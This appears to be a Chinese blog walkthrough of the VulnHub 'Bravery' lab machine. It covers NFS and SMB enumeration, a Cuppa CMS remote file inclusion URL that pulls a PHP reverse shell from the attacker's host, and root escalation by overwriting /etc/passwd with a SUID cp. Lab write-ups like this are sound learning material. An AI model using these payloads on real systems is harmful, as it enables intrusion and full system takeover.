Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.

vulnhub >_ Bravery

Published on 09 Nov 2020

Bravery

image-20200611023042725

image-20200611023445556

image-20200611023523893

image-20200611030502540

image-20200611030409992

mkdir nfs
sudo mount -t nfs 192.168.43.175:/var/nfsshare nfs

image-20200611032610166

image-20200611032653581

qwertyuioplkjhgfdsazxcvbnm

smb

enum4linux 192.168.43.175

image-20200611032941272

image-20200611032902030

smbclient --no-pass //192.168.43.175/anonymous

image-20200611033137230

anonymous 可以匿名连接但是没什么有价值的东西。

secured 不可以匿名连接,使用-u实验一下已知的用户名,已经发现的可能是密码的字符串

smbclient //192.168.43.175/ -U david

image-20200611034208068

image-20200611034430762

image-20200611034718681

逐个浏览

image-20200611041235178

image-20200611041308125

cuppa cms

image-20200611041608266

很多漏洞。选最简单的,远程文件包含

image-20200611041708993

拉shell,改文件名后缀为.txt

http://192.168.1.112/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.1.108:8080/php-reverse-shell.txt

image-20200611080504082

基础枚举后发现cp 拥有SUID

image-20200611084548532

image-20200611084833422

先复制passwd到本地生成,复制root的信息到最后一行,

image-20200611085117882

利用openssl生成新用户evil的hash

image-20200611085830450

替换掉对应的用户名位和密码位

image-20200611085903502

上传到可写目录tmp

image-20200611090145720

利用cp替换

image-20200611090259930

su evil

image-20200611090403674

related posts